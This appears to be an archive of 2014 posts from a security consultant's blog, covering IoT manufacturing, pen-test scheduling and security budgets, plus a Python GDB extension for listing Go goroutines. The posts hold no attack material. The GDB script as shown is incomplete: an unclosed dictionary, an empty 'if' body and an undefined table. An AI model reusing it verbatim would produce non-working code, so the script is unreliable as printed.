Thursday, November 6, 2014

The Internet of Us - Hardware Nowhere

Never leave your buddy behind in Houston, Texas!

The Holy Trinity of Hack

My friends and I used to joke around that there was a "holy trinity" in hacking. You had to understand software, firmware, and hardware in order to bring any value as a security researcher. I still believe that is even more true today than it has ever been. 

The Internet of Things (IoT) movement means merging these three paradigms into a more tightly bound conglomerate than ever before. Software on your cloud/laptop/desktop links to the firmware on your IoT's hardware, which transmits data upstream to the application firmware on your phone's hardware... bla bla bla

Bla, Bla, Blah!
We get it. Everything is connected. 

A Rad New Whatever

What's really cool about this movement is that we're seeing shifts in everything from architectural design to manufacturing. And the manufacturing is key. Think about the average Internet of Things concept. 

Do you want a Rad New Thing to connect your Blah to your Meh? Of course you do! Your Meh will now be IoT capable to speak to any Blah that understands Meh's protocol! 

We're connected! And it's So Special!
But, where do you pick up a Meh? With all the new IoT products that will be saturating the market in the coming years, how does one more easily go out and purchase this a device from the wild ecosystem of choices we'll have? 

I'll tell you how. You wont. The device will be made in your home. 

Get Outta Here

No, really! Have you checked out BotFactory? Their 3D printer, Squink, which survived its Kickstarter round in August, is designed to do this very thing. Sort of. 

Squink is the first step in this direction, and BotFactory clearly has the idea of home manufacturing in mind for their end game (at least they had better, or I'd be a really confused VC). 

Dog, I thought you wuz makin' serious tech, bruh... 
Squink takes 3D printing to the next level by introducing the concept of building printed circuit boards (PCBs) in the home. But, they even promise to go one step further. They state that Squink will be able to function as a Pick and Place machine as well. This means that not only will it be able to print circuit boards on demand, it will be able to place components on the board as well. 

The next step? On demand builds of hardware devices, flashed with firmware downloaded over the Internet. 

Need that Meh for your Blah? You've got it! 

But What Does It all Mean?!

If you're still wondering why this is important, think about how manufacturing affects the cost of devices that you use. Think about FoxConn in China, and the workers that have to build products for Apple. Think about the increased cost of business not only for those local economies, but for the companies that outsource from their home country overseas. Think about the massive amount of hardware trash piled up in India, Malaysia, China, and other countries that tear down and harvest the components we throw away. 

No, really....

Simplifying the manufacturing process to the homes that want the devices means the potential to change this existing model. It means decreasing the cost of manufacturing and making only one device instead of one hundred devices just so one customer can acquire that one device. That can disrupt a product's entire pricing model, ecological impact, and availability in a major way. 

This also means that hardware becomes far less important. Instead of hardware seeming like this esoteric voodoo magic box that only a small percentage of us understand, it opens up and becomes widely accessible. Why? 

Because we no longer need to care about it! Anyone will be able to build and play with their own circuit boards on demand at little cost! And they will be able to share their designs for free over the Internet instantaneously! That's incredible! 

Models Gonna Modulate

Essentially, we're on the precipice of another shift in computing. We oscillate back and forth between highlighting the importance of software, to the importance of hardware, and back. We're about to shift again. For how long? Who knows. That doesn't matter. 

What does matter is that security models will account for the upcoming change. How do we secure devices that are made on demand in the home? How will provisioning work? How will the firmware be loaded onto the new device? Can the firmware be signed and delivered over the network? If so, what does that require on the part of the 3D printer? 

There are many questions that must be answered here, and at Lab Mouse Security, we're preparing our answer. 

As always, if you have questions about IoT security, or want to engage us for a code review, please reach out to us via our Contact Page. 

Best wishes for the Internet of Us!
Don A. Bailey
Lab Mouse Security

Thursday, October 23, 2014

If You Haven't Pen-Tested Now, Wait

Abstinence Or Whatever

This morning, my esteemed peer Shawn Moyer referred to a blog post he wrote in September 2013 on waiting for pen-testing until Q1, but buying in Q4. He's not wrong

Shawn makes strong points about the money and the actual work-load on the consultant side. The fact is, teams traditionally get so swamped in Q4 that they do indeed place junior resources where they shouldn't. But, Atredis and I have one thing in common: we don't have to care about that problem. None of us are juniors. We're all principal-level consultants. Nor do we have the overhead of managing or maintaining interns to try and eek out results. 

While Shawn discusses the pen-testing team's side of the fence, I'm discussing the client's issues with scheduling a penetration test in Q4. If you haven't purchased a pen-testing engagement already, you should schedule the test for Q1. 

There Goes E911

Q4 isn't just the most lucrative time of year for tech companies, it's the most profitable time of year for most companies. As a result, everyone is on high alert to manage their resources as effectively as possible. This means not focusing on organizational security in the event of an emergency. Case in point? 

Intrado, the company that manages the majority of the United States' E911 service had their system fail for over 11 million people across seven states, including the entire state of Washington. No one could make a 911 call during that time period. Intrado happens to be based here in Colorado, and I happen to have personal experience with them. The fact is, they're an exceptional company and I have been impressed by their above-average engineering expertise. 

Regardless, how do you think the organization - that is one of the country's only third-party 911 contractors - would have reacted if this event occurred during Q4? During Black Friday? During Christmas? God forbid, during Devil's Night? The security and engineering teams would be completely re-tasked toward assessing an event like this, why it occurred, how to remediate it, whether a bad actor was involved, etc. Any penetration test at this point would - and should - immediately stop. 

Point being, whether you're managing E911 infrastructure for the entire country, or simply building a web service that caters to hundreds of thousands of engineers world-wide, prioritization is key. Losing customers is never an acceptable choice. When resources are constrained during an already busy time of year, priorities must align with the business' key goals, and nothing else. 

Schedule Effectively 

So, if you're considering buying penetration services now, don't. Why? It's already going to be the last week of October. Buying services now generally means 
  • one to three weeks of sales process
  • a week or two of scheduling resources on both sides
  • actual engagement: anywhere from 2 days to 2 weeks (on average)
If you're buying services now, this puts your actual engagement starting date anywhere from November 10th to December 1st. If you're on the light side of a test and only need a couple days of effort, you're still looking at remediation through one of the busiest holiday seasons in the country: Thanksgiving. If you're on the heavy side of the test, you're going to be running into mid-December. That means the week of Dec. 15th your team will be scrambling to remediate security issues during *the* busiest two holidays in the world: Christmas and New Year's Day

Any critical event during this time means that the results of any penetration test must be put off until the critical event has passed. On average, any overlapping operations/engineering/security event takes between one week to a month to evaluate, remediate, and monitor. During this already swamped time of year, that means that the results of any penetration test will be ignored for up to two months if a critical event occurs adjacent to a common vacation or holiday period. This is a total waste of money! 

Don't Kill Money!

The only value of a penetration test has is when the results can be used within an effective period of time. This means weeks after the penetration test has occurred. Otherwise, because of the increased amount of security risks being identified in modern times, any penetration test performed today will have drastically different results than one performed a month from now. 

Remember ShellShock? Heartbleed? Cisco's ASA flaws? LZ4? SSLv3 POODLE? We're seeing more and more game changing flaws coming out, and security teams are already flooded with a To Do list longer than Santa's naughty list. 

Scheduling a pen-test during Q4 is basically asking to be put on Santa's naughty list for knowingly booking an engagement whose output can't be fully utilized in an effective time frame. Don't do it! Don't kill money!

Sure, spend the money today. Book the team. Get the most effective engagement for your budget and your organization's needs. But, schedule it for a time when the output of the engagement will bring the most value to your organization. That, typically, means Q1. 

So, if you want the most value out of a security review, check out Lab Mouse. Even check out Atredis. Book a team that is going to maximize your investment by providing you with only top-tier talent, but only schedule the engagement when the timing makes sense for your organization. 

Hey, Intrado, if you need someone that specializes in mobile/embedded/Erlang/telco to help you with a security or code review of your E911 system, give me a shout. I'll give you a good deal since you're local and I already love ya. 

Don A. Bailey
Lab Mouse Security

Tuesday, October 21, 2014

GoLang Debugging - Turning Pennies Into G's

GDB Ain't Great

Our favorite application debugger is awesome. Don't get me wrong, I use it often. Almost daily. But, the fact remains that GDB is dependent on a predefined legacy application architecture. GDB wasn't designed to predict new application architectures. As a result, it isn't elegant at supporting alternatively designed stacks, concurrency models, or execution flows. 

That's essentially why GDB has been enhanced with extension capabilities like Sequences, Guile, and yes, even Python. Unfortunately, even the extension system is a bit lacking. Case in point? The existing GoLang GDB script uses a completely outdated extension API that causes exceptions. It wasn't super useful to begin with, either. 

donb@evian-les-bains:~/home/library/golang/go/src/pkg/regexp$ GOMAXPROCS=9 /usr/bin/gdb -q ./regexp.test
Reading symbols from ./regexp.test...done.
Loading Go Runtime support.
(gdb) run
Starting program: /home/donb/home/library/golang/go/src/pkg/regexp/regexp.test 
Program received signal SIGINT, Interrupt.
runtime.usleep () at /home/donb/home/library/golang/go/src/pkg/runtime/sys_linux_amd64.s:77
77              RET
(gdb) info goroutines 
Python Exception <class 'gdb.error'> Attempt to extract a component of a value that is not a (null).: 
Error occurred in Python command: Attempt to extract a component of a value that is not a (null).
In the above example, we see a common debugging scenario that's been going on for over a year or two. The debugging process is even documented on the GoLang website under Debugging Go Code With GDB. Yet, when one tries to reproduce the steps outlined in the documentation, the above error occurs. 

Why does this happen? The script packaged with GoLang uses an outdated model for accessing gdb.Value objects, essentially treating them as dictionaries. Because the internals of the gdb.Value no longer support this model, or allow linking via Python generators in the fashion used in the script, simple commands will fail.

Go Routine Yourself

To solve these horrors, we really just need to generate a class that handles retrieval of pertinent values from the GoLang runtime environment. For those not in the know, each GoLang application acts like a kernel, scheduling the execution of each Go routine, monitoring memory allocations, and preparing for garbage collection.

Before you start to become concerned about potentially severe user-land bloat, take a moment to realize that this is actually the correct architecture. Any robust production quality application must handle resources elegantly by silently monitoring for operating system signals, scheduling and managing thread synchronization, handling per-thread intercommunication, and efficiently allocating and deallocating subsystem resources transparently. GoLang accomplishes all these things, but with surprising eloquence and a new level of light-weight that even Magdalena Frackowiak would be jealous of.

GoLang executes in tiny self-contained executable images called Go Routines, which are co-routines handled by GoLang's internal scheduler. GoRoutines are not threads, they are simple co-routines that execute under an Operating System thread. The benefit of this is that GoRoutines can move transparently across OS threads (pthread, libthread (Solaris), etc) with almost no cost to the application.

GoRoutines are managed by the C language structure 'struct G'. Operating system threads are managed with the C language structure 'struct M'. Therefore, for every OS thread M, one or more G may run within it. There are other abstractions within the GoLang scheduler, but since those aren't relevant to this discussion we'll leave those abstractions alone for now.

All The G

Internally, GoRoutines are managed under the runtime package. There is a variable called runtime.allg which points to a list of all GoRoutines in the system. A corresponding length variable, runtime.allglen, defines how large this array is. As GoRoutines die, they are marked by their status as Dead. But, unless it is overwritten at some point, the pointer in allg lives on. So, you can inspect what's left of a GoRoutine even after it has moved on to its next iteration.

To solve our problem with GDB, we have to inspect the allg variable. As can be seen in the existing code, this used to be as easy as calling gdb.parse_and_eval. Now that we can no longer act this easily, we have to use what resources are available to us to retrieve values from memory, even if it's a notorious pain in the ass.

Let's build a simple Python class around this idea. Because I solved my problem with this code last night in two hours while watching classic episodes of The Rockford Files, it isn't a super great solution. Regardless, it works and frankly because no one else has solved this problem for 2+ years, I don't care if you don't like it.

class Allg:
    __allglen = -1
    __position = 0
    __allg = 0

    __offsets = {
            'status': 152,
            'waitreason': 176,
            'goid': 160,
            'm': 200,
            'sched': 40,
            'sched.pc': 48,
            'sched.sp': 40,
            'stackguard': 120,
            'stackbase': 8,

    def __init__(self):
        # first, fetch the number of active goroutines
        self.__allglen = int(gdb.parse_and_eval("&{uint64}'runtime.allglen'"))
        print("found allglen = {0}".format(self.__allglen))

        # get the next address in the array
        s = "&*{uint64}(&'runtime.allg')"
        self.__allg = int(gdb.parse_and_eval(s))
        print("found allg = {0}".format(hex(self.__allg)))

    def fetch(self):
        if self.__position >= self.__allglen:
            return None

        s = "&*{uint64}(" + "{0}+{1})".format(self.__allg, self.__position*8)
        p = int(gdb.parse_and_eval(s))
        self.__position += 1
        return p

    def Status(self, a):
        s = "&*{int16}(" + "{0}+{1})".format(a, self.__offsets['status'])
        return int(gdb.parse_and_eval(s))

    def WaitReason(self, a):
        s = "&*{int64}(" + "{0}+{1})".format(a, self.__offsets['waitreason'])
        x = int(gdb.parse_and_eval(s))
        s = "&{int8}" + "{0}".format(x)
        return str(gdb.parse_and_eval(s))

    def Goid(self, a):
        s = "&*{int64}(" + "{0}+{1})".format(a, self.__offsets['goid'])
        return int(gdb.parse_and_eval(s))

    def M(self, a):
        s = "&*{uint64}(" + "{0}+{1})".format(a, self.__offsets['m'])
        return int(gdb.parse_and_eval(s))

    def Pc(self, a):
        s = "&*{uint64}(" + "{0}+{1})".format(a, self.__offsets['sched.pc'])
        return int(gdb.parse_and_eval(s))

    def Sp(self, a):
        s = "&*{uint64}(" + "{0}+{1})".format(a, self.__offsets['sched.sp'])
        return int(gdb.parse_and_eval(s))

    def Stackguard(self, a):
        s = "&*{uint64}(" + "{0}+{1})".format(a, self.__offsets['stackguard'])
        return int(gdb.parse_and_eval(s))

    def Stackbase(self, a):
        s = "&*{uint64}(" + "{0}+{1})".format(a, self.__offsets['stackbase'])
        return int(gdb.parse_and_eval(s))

Using the class Allg, I simply identify the address of the runtime.allg symbol in memory, and its corresponding size parameter, runtime.allglen. Once I store these parameters internally, I can just fetch every subsequent GoRoutine's address from the array. Since these routines are allocated sequentially in the array, I can fetch them using a simple iterator. Then, I just pass back the pointer of the actual G* structure. Any time the caller wants to learn more about a specific G*, they just pass back the address to any other function in the class, which will return the value for the corresponding G* field. 

This simple class makes data retrieval very easy. Let's look back at the class that gets invoked when we execute info goroutines on the GDB command line. 

class GoroutinesCmd(gdb.Command):
    "List all goroutines."
    __allg = None

    def __init__(self):
        gdb.Command.__init__(self, "info goroutines", gdb.COMMAND_STACK, gdb.COMPLETE_NONE)

    def invoke(self, _arg, _from_tty):
        self.__allg = Allg()

        # donb: we can retrieve the correctly size pointer with a cast
        # (gdb) python \
        # print("{0}".format(gdb.parse_and_eval("&*{uint64}&'runtime.allg'")))
        while True:
            ptr = self.__allg.fetch()
            # print("fetched ptr = {0}".format(hex(ptr)))
            if not ptr:

            st = self.__allg.Status(ptr)
            # print("status is {0}".format(st))
            w = self.__allg.WaitReason(ptr)
            # print("waitreason is {0}".format(w))
            #if st == 6:  # 'gdead'
                #print("skipping over dead goroutine")

            s = ' '
            m = self.__allg.M(ptr)
            if m:
                s = '*'

            # if the status isn't "waiting" then the waitreason doesn' tmatter
            if st != 4:
                w = ''
            w2 = w.split('"')
            if len(w2) > 1:
                w = """waitreason="{0}\"""".format(w2[len(w2) - 2])

            pc = self.__allg.Pc(ptr)
            blk = gdb.block_for_pc(pc)
            goid = self.__allg.Goid(ptr)
            a = "fname={0} faddr={1}".format(blk.function, hex(pc))
            print(s, goid, "{0:8s}".format(sts[st]), a, "&g={0}".format(hex(ptr)), w)

How simple is that? Now, the routine can fetch each G* from within the invoke function's while loop, and print information regarding the runtime. 

donb@evian-les-bains:~/home/library/golang/go/src/pkg/regexp$ GOMAXPROCS=9 /usr/bin/gdb -q ./regexp.test
Reading symbols from ./regexp.test...done.
Loading Go Runtime support.
(gdb) run
Starting program: /home/donb/home/library/golang/go/src/pkg/regexp/regexp.test 
Program received signal SIGINT, Interrupt.
runtime.usleep () at /home/donb/home/library/golang/go/src/pkg/runtime/sys_linux_amd64.s:77
77              RET
(gdb) info goroutines 
found allglen = 5
found allg = 0xc208018000
  16 waiting  fname=runtime.park faddr=0x4134d9 &g=0xc208002120 waitreason="chan receive"
* 17 syscall  fname=runtime.notetsleepg faddr=0x404a56 &g=0xc208002480 
  18 waiting  fname=runtime.park faddr=0x4134d9 &g=0xc208032240 waitreason="GC sweep wait"
  19 waiting  fname=runtime.park faddr=0x4134d9 &g=0xc2080325a0 waitreason="finalizer wait"
* 31 waiting  fname=runtime.gc faddr=0x40a0c6 &g=0xc2080326c0 waitreason="garbage collection"
(gdb) goroutine 31 bt
found allglen = 5
found allg = 0xc208018000
#0  0x000000000040a0c6 in runtime.gc () at /home/donb/home/library/golang/go/src/pkg/runtime/mgc0.c:2329
#1  0x000000000040a150 in runtime.gc () at /home/donb/home/library/golang/go/src/pkg/runtime/mgc0.c:2306
#2  0x00007fff00000000 in ?? ()
#3  0x000000c21531e000 in ?? ()
#4  0x000000000055fc00 in type.* ()
#5  0x0000000000000001 in ?? ()
#6  0x0000000000000000 in ?? ()

We can even use the goroutine command using the same Python class to retrieve information about a specific GoRoutine, and then execute a gdb command based on that routine. Excellent!


This isn't a great way to debug GoLang. There is a lot that is left desired here. For example, stack backtraces are still difficult because of the execution architecture. GoLang's toolchain uses an internal Base Pointer (BP) and doesn't emit one when the binary is generated. This is a legacy of the Plan 9 Operating System assembler, which is intelligent on CISC ASM architectures such as x86/64 becuase it enables %R/BP to be used as a general register. 

But, as a result, GDB doesn't know how the heck to rewind the stack. In fact, you have to inspect the current function's SP adjustment code to identify how far to rewind the stack before popping off the return value. I've accomplished this (the basics) in another change I've made to the GDB script. But, I'll share that another time once I finish dealing with some of the gotchas of this method. 

Regardless, for now, you have a simple way to print each GoRoutine during a GDB session. You also have an easy way to identify where in memory each G* exists, and can inspect them with ease, and that's a lot better than you've had it for the past couple of years! 

GoLang Security Auditing 

Are you worried about the real internal security surface of the GoLang application architecture? Are you worried about how the subtleties of the custom scheduler can affect data consistency across co-routines? Are you wondering if the split-stack architecture puts you at risk for memory segement collision under significant client-request pressure? Are you concerned that poorly-written third party libraries might subvert the otherwise mostly-sound GoLang security model?

Come check out Lab Mouse Security! I've been working with GoLang since the project was made public. I understand the internal runtime architecture, the compiler toolchain, and how the security model affects real-world applications. If you're interested in GoLang security, consider having Lab Mouse evaluate the security of your GoLang application today! 

Don A. Bailey
Lab Mouse Security

Tuesday, October 7, 2014

The Internet of Us

It'll all be OK, little guy. 

It's Not Me, It's You

I've been analyzing and building Internet of Things technology since 2009. At the time, my wife Jessica and I were living in a condo building in Denver's Capitol Hill neighborhood. Nick DePetrillo and I had just started working on The Carmen San Diego project, and I was just launching my career at iSEC Partners after leaving a failing security practice elsewhere. It was a stressful but exciting time. 

One of the ways I dealt with the stress was learning how to solve community problems with technology. Our condo building was tall, and the stairs were common "hotel style" stairwells, not optimal for travel in any scenario. Living on the seventh floor, we opted to take the elevators like everyone else. Normally this would not invite any kind of concern, except that we lived with Jessica's 80 pound golden doodle, Jasper. 

By a court of law!
Jasper is a great guard dog. He's as beautiful as he is vicious, and he is exceptional at protecting us from falling leaves, marauding squirrels, and even actual creepers lurking around Denver's parks. He's also quite disciplined. In elevators, he'd sit patiently and wait for the doors to open without a sound. Jessica did an excellent job of training him. 

The problem would come when the older residents of the condo would get into the elevator. Well, really, only two particular individuals. One was an older lady that enjoyed making a problem out of fading paint on the walls. She relayed to our door man that it was unacceptable for a dog to be in the elevator at the same time as she was. Ridiculous! The insolence of a couple with an approved dog traveling to and from their own condo! Unthinkable! 

I have a feeling that the woman was trying to somehow bully the condo board into allowing her exclusive access to an elevator. Seriously. Regardless, it presented an awkward problem as we didn't appreciate getting a complaint just for getting in the elevator with a dog that wasn't even behaving badly. 

No, Really. It's You.

My solution to this problem was tinkering. I attached a Zigbee module to an Atmel microcontroller, used an Electronic Assembly DOGS LCD screen, a few LEDs, and two LED-backlit push buttons. Result? I had a little mesh-based alerting system that would notify you if Jasper was in the elevator! 

The code was simple. As soon as I left my condo I could press the button on what I named the "Beagle Box" (I was unaware of the Beagle Bone at the time; don't hate). Pushing the button would send a message to all nodes in the mesh that Jasper would be in the elevator for the next 5 minutes. Either the "warning" would time out, or I could log in on another "Beagle Box" in the lobby. 

Class doesn't automatically come with age.
I never ended up deploying the box, because designing it made me realize that there was an easier solution to my problem. I could simply record a few videos of Jasper behaving perfectly in an elevator with other tenants. Then, I wouldn't have to bother maintaining equipment or debug RF signaling issues throughout the building. 

Point being, I found a social method for diffusing the problem. But, the technology itself made me realize a few key things about the Internet of Things. 

First, people that are eager to create problems can be exposed by technology that disputes their manipulative or sociopathic point of view. 

Second, real community problems can be isolated, evaluated, and potentially mitigated through cost-effective and practical technology. 

It Can Be Us.

I don't see the Internet of Things as just another trend in technology. I see IoT as the next generation of the Internet. But, the Internet is no longer about desktops and servers and intangible opaque applications. The Internet is about Us. We'll be living in the Internet of Us, and we need to think about how to build for Us, not I. Not the 1%. Not the Silicon Valley VC pool. Us. 

And Us isn't easy, is it? Us includes a population that isn't as technologically savvy as my peers. According to Pew Research, one in four teens solely uses a mobile phone to access the Internet. In fact, Pew goes on to state that teens in lower income socio-economic groups are even more likely to use their mobile phone as their primary Internet access point. 

Why is this important? Twenty-five percent (25%) of teens lack access to the Internet in their home, which is why they are focusing on their mobile phone as their pivot point to the Internet. Only half of teens have access to smart phones, which drastically changes the content that teens access, especially at-risk teens. This means they aren't coding. They aren't learning shell commands. They're not even learning about web technology. They're information sinks. 

A much more profound game of telephone is happening right now.
If IoT is going to solve community problems, IoT must be ready to solve the communications issue as well as the socio-academic gap. Communications technology will keep getting cheaper, and soon these numbers will be more representative of a largely connected population. But, we're just talking about USA. What happens when we expand to the Americas, Europe, Africa, and other evolving countries? How do we ensure technology is seamless, secure, and usable for all academic levels? 

That's quite the challenge, which is why technology usually focuses on a subset of the population. It's easier. And that's fine. But, focusing on easy to deliver platforms that enable 1% of the population doesn't solve community need and only widens the gap between the have's and have-not's. 

But First, I Need You. 

To solve these problems we need a cost-effective, secure, and agile platform for the Internet of Things. I am building one based on my research, and am in the middle stages of developing the proof of concept. However, the key metric for success, to me, isn't a snazzy new Thing that solves all our Facebook-connectivity-audio-enablement-bass-drop concerns. It's a thing that binds communities together and enables security, safety, and education. 

I *am* the music! Errr..
For example, have you heard of Shot Spotter? I've you've ever seen me give a talk on IoT, you've probably heard me bring it up. Shot Spotter detects gun shots in real time, and passes the information along to law enforcement. It can detect the caliber of a gun, direction of a shot, whether a shooter is moving (drive by), and more. That's excellent technology! But, it comes at a steep price. 

Unfortunately, a lot of communities that want to use Shot Spotter are struggling because they have much more immediate concerns to deal with. Detroit and Flint Michigan are having serious water treatment and infrastructure concerns, resulting in a massive increase in the price of water bills. Do you think the city wants to shell out hundreds of thousands of dollars for a gun shot detection system when basic services are at risk? 

Ominous raven agrees: expensive technology is scary!
What if a secure open source version of the same technology could be built with a simple to use and cost-effective platform? What if we could help secure cities for dollars instead of millions? We can. Internet of Things technology can enable this, but only with the right minds working together. 

I want to bring together lawyers, law enforcement, technologists, city planners, and members of communities to discuss tangible issues that can be addressed with a cross-section of open-source technology, IoT, and information security. The goal isn't to disrupt cities, but to help them restructure their foundation. 

Want to help? Contact me at Lab Mouse Security. As I build the IoT platform, we can find ways to use it for more than the next generation of the Bluetooth speaker. We can change lives for the better. 

Lab Mouse Security

Monday, October 6, 2014

Start-Ups, Information Security, and Budgets

Start Up, not Down. 

The 80's Were Ok, I Guess

As a child of the 80's, I was raised with a lot of mixed messages. These messages took a lot of bizarre forms. I distinctly remember Poison's "Open Up and Say Ahh" being re-released solely because parental groups were concerned that the devilish cover was somehow hypnotizing teens into a riotous hormonal rage. It surprised me, even at the tender age of nine, that somehow covering up the image except for the eyes would appease these groups that supposedly cared about decency. 

Hair Metal Hijab!
George Carlin was more controversial

Weren't the lyrics and hair-metal themes far more of a concern than ridiculous cover art? Either way, I certainly didn't care because it meant that I was finally able to purchase my own copy of the album. And boy, was I thrilled to tear open that cassette packaging - completely ignoring the cover art - to settle into less than an hour of sonic distress that I would soon toss into a pile of tapes and forget.  

Much Better Music
Regardless, this was one of the earliest instances I can recall where adults made insincere compromises in the name of safety (and, I guess, decency). Let's not forget that only three years earlier, Tipper Gore founded Parents Music Resource Center. The PMRC advocated against music that glamorized sex, drugs, and violence (by which I guess they mean Rock and Roll). What they didn't tell us is that Tipper was (at the time) a closet dead head that went on tour in her youth. I bet she and Bill had many a nostalgic night reminiscing about never inhaling

Tipper performing Sugar Magnolia with The Dead 4/20/09

But, I'm Checking Boxes

These behaviors and mixed messages bleed into everything humans do. We project our perception of social norms onto the things we create, whether it's a plane, car, or an Internet connected watch. I've engaged with a growing number of organizations this year that are thinking about security from a similar perspective. It's easy for executives to talk with each other and identify the methods they are using to secure their networks. Because security seems like such an intangible black box, it is difficult to quantify the actual return when a budget is assigned to decrease risk. Therefore, if executives see that their company's activities fall in line with the activities of other companies that have not been publicly compromised, all must be well! 

However, as is often the case with simply checking boxes and moving on, reality is quite different. Home Depot, Target, and other major organizations subject to recent computer-based attacks were all subject to PCI compliance. This means that they were indeed checking boxes, validating patches, and scanning networks to ensure a decreased threat surface. And yet, they were compromised! 

Hackers gonna hack, AMIRITE!?
Penetration tests can assist in providing a base line for infrastructure, but that baseline is simply a snapshot in time. Because of the constant change in the security ecosystem, today's scan will never be representative of tomorrow's network, even if the network components haven't changed. Security is a commodity whose value is constantly in flux, so evaluating risk on this action alone is not only misleading, it's devoid of value. 

Penetration tests cost tens of thousands of dollars and may be performed once a month, or even once per quarter. Yet, if the security landscape of the organization is constantly at flux, these tests provide absolutely no insight into the real state of the organization and its assets. As a result, the organization is essentially flushing away hundreds of thousands of dollars down the toilet because it hasn't used the output of a penetration test effectively. 

Realigning Organizational Strategy

This trend is even more of a concern when the Internet of Things trend becomes a part of every day business. As IoT systems become more ubiquitous in the workplace, new threat models, assessments, and controls must be put into place to identify how to monitor, manage, and deploy these assets. If you thought Bring Your Own Device was bad, consider Bring Your Own Anything. 

In several cases over the past year and a half, clients have had difficulty seeing the value in evaluating the architecture of their IoT product or service. The executives I've spoken with have had concerns about the cost of such a review, which is understandable. When you pay money for a service that has a seemingly intangible return it is difficult to pull the trigger. This is especially true if you misunderstand your team's security experience and believe that patching and penetration testing has anything to do with threat modeling and architectural strengthening. 

The flip side of the coin exposes the other executives I've spoken with. These executives understand the value of a security review and believe they need it. However, they are having trouble allocating budgetary resources toward security review because it is too early to allocate funds for consultants on an intangible piece of the technology puzzle. These executives know the value, but are having trouble selling the value upstream because start ups have limited resources and must work at a fast pace. 

Doozers solving architectural security concerns (clearly).

These are all understandable problems that I actually sympathize with. It's difficult to understand what a valuable security practice is without having gone through the process of incorporating one into a product or service. It's even more difficult to incorporate a valuable security practice when your entire seed budget or A round is focused on boot-strapping a proof-of-concept that will get you partnerships in key verticals, or access to a larger client pool. 

Bottom Line it For Me

Let's go over some numbers, shall we? Maybe this will help elucidate the actual return of a security program integrated into product or service, either being developed or being used. 

On average, the cost of a penetration test is Man Hours multiplied by the days needed to scale for the scoped infrastructure, plus overhead, reporting, and on-site requirements. Let's start out with a simple example of Average Start Up (ASU). ASU has an average start-up size of twenty people. They have a small in-office datacenter, cloud infrastructure, and hosted physical servers in two separate locations (east coast and west coast). This is Pretty Average. 

Let's say ASU is smart and knows that the penetration testers are skilled, estimating that it will take them 2-3 days to compromise the network. ASU wants data from this project, so they need a well written report and assistance interpreting the data correctly. Add another 2 days of work. So, let's give the project a full five business-day scope. Two penetration testers are engaged in the process to minimize the time required to scan and evaluate the entire infrastructure. Consultants work a flat eight hour day. The industry average is around 250 USD per hour. But, since ASU is a start up, let's presume they get the "friendly" introductory rate of 150 USD per hour. So, we're talking:

Days = 5
Hours per day = 8
Consultants = 2
Price Per Hour = 150 USD
Days * Hours * Consultants * Price = 12,000 USD

Keep in mind that the 12,000 USD is only to obtain the results of the penetration test. Once personnel at the organization implement the changes required to "pass" the test, a new test must be performed. Let's just presume for now that this second test is free, since Pen Test Company (PTC) is running a special for Start Ups like ASU. 

But wait! There's more! ASU gets the benefit of the re-test that gives them a passing grade. But, they keep hearing about all these new vulnerabilities coming out of the wood work: LZO, LZ4, HeartBleed, BashBug, etcetera. 

And what's this about some bizarre new RSA 1024bit key hack thingie?!? Is that even real!? How do we test for that?! 

Ah, yes. Now that penetration testers have to come back. If it's once per quarter, now we're talking about 48,000 USD per year. If it's once a month, which is a more realistic number to get a somewhat reasonable analysis, now we're talking about 144,000 USD per year. Unsustainable. 

At this point executives are rightfully pissed, and probably feel pretty shitty about where their money is going. The security process seems unmanageable, and the money feels burned. 

Stop Killing Money

There is an easy way to stop this ridiculous cycle. It starts with a simple threat model, and ends with processes and controls that integrate security into not only the daily engineering process, but the work place. Every technology can be hacked. My work is proof of that. I have exceptional colleagues that are proof of that even more than I am: Charlie Miller and Chris Valasek, Zach Lanier and Mark Stanislav, Stephen Ridley, Thaddeus Grugq, Ben Nagy, and countless others. 

Yes, everything can be hacked. But, there is a method for reducing the potential for risk and managing it in a cost-effective manner:
  • Identify key assets that affect the business, its partners, and its customers
  • Prioritize assets by potential effect 
  • Build security goals around these prioritized assets
  • Define policies and procedures that support security goals
  • Ensure infrastructure supports security goals
  • Monitor infrastructure constantly, assign responsibilities
  • Integrate security engineering into the product and/or service life cycle
This simple seven step process will take a company from zero to hero far faster than they ever could with penetration testing engagements or managed security services. Let's look at a simple engagement for a consultant to walk ASU through this process.

Asset review/Priority meeting/Initial Threat Model = 5 days - 10 days avg. 
Defining policy and procedure/Enhancing infrastructure/Building baseline = 5 - 10
Define monitoring system/Assign responsibility/Add OSS controls = 5 - 10
Integrate security into SDLC (only if org has engineering dept) = 10
Average consulting rate = 250 USD per hour
Total High Watermark = 80,000 USD
Total Low Watermark = 50,000 USD

A single threat modeling and architecture enhancement engagement will cost between 50,000 USD and 80,000 USD. It typically only needs to be performed once. A solid architecture not only enables the organization to diminish its risk, but it helps the organization understand how to manage its security in a way that provides longevity. When a threat arises, the organization will be better equipped to respond effectively, rather than relying on an external organization to swoop in and solve the problem for a six figure price. 

In addition, internal penetration testing capability and vulnerability assessment automation can be integrated into the process defined by this engagement, allowing the organization to not only audit themselves but to interpret the results of the audit effectively. 

For an organization the size of our example, ASU, they would come in at the low end of the price spectrum. Even at the high per-hour rate of 250 USD, the project would still come out only 2,000 USD above the quarterly penetration testing price, but with a far greater return on investment! If ASU negotiated the price down to the same rate as the penetration testing team, 150 USD per hour, the cost would end up at 30,000 USD. This is only two and a half times the price of an average penetration testing engagement. 

Failure Shouldn't Be Feared

Will organizations get hacked? Of course. Will an organization with a well defined security practice still get hacked? Unfortunately, it is likely. But, will an organization with a well defined security practice identify, isolate, and expunge the threat quickly and effectively with far less risk to the business and its clients? Yes! 

The security process is not perfect. But, that is no reason to allocate resources to the wrong activities, then argue that we did the same things everyone else did when a risk is abused. Instead of learning to do the wrong things, we must be brave enough to do the things that are harder, sooner. 

If we learn these lessons, we'll be able to decrease risk not only in our working environments, but within our products and services. Failure isn't something to be terrified of. We must integrate the lessons learned into our processes to ensure that we are less likely to fail, instead of shaking our head and presuming that isn't going to be me.

More importantly, when companies get ready to IPO or become acquired, lawyers are telling us that it is becoming increasingly more common for security audits to be a forced part of the process. There have been more than a few cases in the past several years where companies were being evaluated for acquisition and failed because the security architecture was so unmanageable it would require a complete architectural overhaul. This is not how you get a shiny new red 1993 Porsche 911. 

Success is a mobile phone. 

Everyone fails sooner or later, especially in information security. Pretending like the underlying problem doesn't exist is the same as putting black bands on a Poison cover album and saying you've saved the innocence of American teenagers. The real sign of success in an information security program is how quickly you recover, how effectively you can isolate risk to your business and your clients, and how much your customers trust your transparency. 

